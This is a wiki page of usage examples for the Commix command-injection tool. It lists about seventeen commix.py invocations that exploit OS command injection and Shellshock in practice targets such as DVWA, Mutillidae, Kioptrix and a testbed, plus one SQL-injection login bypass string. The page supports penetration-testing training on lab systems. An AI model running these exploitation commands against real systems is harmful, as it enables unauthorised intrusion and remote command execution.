Skip to content

Usage Examples

Jump to bottom
Anastasios Stasinopoulos edited this page Jun 3, 2022 · 43 revisions

1. Exploiting Damn Vulnerable Web Application:

  1. Low level OS command injection:

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=low; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

  1. Medium level OS command injection:

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

  1. High level OS command injection:

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=high; PHPSESSID=nq30op434117mo7o2oe5bl7is4" --technique=f --web-root="/var/www/html/"

2. Exploiting php-Charts 1.0:

Exploitation via using custom injection payload suffix and prefix string:

python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"

3. Exploiting OWASP Mutillidae:

Exploitation via using extra HTTP headers and HTTP proxy:

python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

4. Exploiting Persistence:

Exploitation via using an alternative (python) shell:

python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"

5. Exploiting Damn Vulnerable NodeJS Application:

python commix.py --url="http://127.0.0.1:9090/app/ping" --data "address=127.0.0.1" --cookie="connect.sid=s%3AIdvte5ieuGQC5C8jt5aSyUTSF8xZtls8.3fwCVsyypx%2BLGXtiF1JTBrqbmjp%2B29vwKoL0uxcHub8"

6. Exploiting Kioptrix: Level 1.1 (#2):

python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"

7. Exploiting Kioptrix: 2014 (#5):

Exploitation via using custom user-agent and specified injection technique:

python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --web-root="/"

8. Exploiting CVE-2014-6271/Shellshock:

python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock

9. Exploiting commix-testbed (cookie):

python commix.py --url="http://127.0.0.1/scenarios/cookie/cookie(classic).php" --cookie="addr=127.0.0.1" -p addr

10. Exploiting commix-testbed (user-agent):

python commix.py --url="http://127.0.0.1/scenarios/user-agent/ua(blind).php" -p user-agent

11. Exploiting commix-testbed (referer):

python commix.py --url="http://127.0.0.1/scenarios/referer/referer(classic).php" -p referer

12. Exploiting Flick 2:

Exploitation via using custom HTTP headers and base64 encoding:

python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64

13. Exploiting commix-testbed (JSON-based):

python commix.py --url="http://127.0.0.1/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'

14. Exploiting SickOs 1.1:

Exploitation via using shellshock module and HTTP proxy:

python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"

15. Exploiting Damn Vulnerable GraphQL Application:

  1. OS Command Injection #1:

python commix.py --url="http://127.0.0.1:5000/graphql" --data='{"query":"mutation{importPaste(host:\"commixproject.com\" , port:80 , path:\"/\" , scheme:\"http\"){result}}"}'

  1. OS Command Injection #2:

python commix.py --url="http://127.0.0.1:5000/graphql" --data='{"query":"query {systemDiagnostics(username:\"admin\" , password:\"admin123\" , cmd:\"test\")}"}' -p cmd

16. Exploiting commix-testbed (XML-based):

python commix.py --url="http://127.0.0.1/scenarios/regular/POST/classic_xml.php" --data='<?xml version="1.0" encoding="UTF-8"?><ping><addr>127.0.0.1</addr><count>4</count></ping>'

17. Exploiting Damn Vulnerable Web Sockets:

  1. Use HTTP2WebSocket to run the listener on port 3333 and connect to dvws.local:8080 web socket app on every HTTP request:

python3 HTTP2WebSocket.py -l 3333 -t ws://dvws.local:8080

  1. Exploit the OS command execution:

python commix.py -u "http://127.0.0.1:3333/command-execution" --data="addr=127.0.0.1"

At the right side panel, you can find detailed information about Commix Project.

Contents

User's manual

Exploitation

Miscellaneous

Clone this wiki locally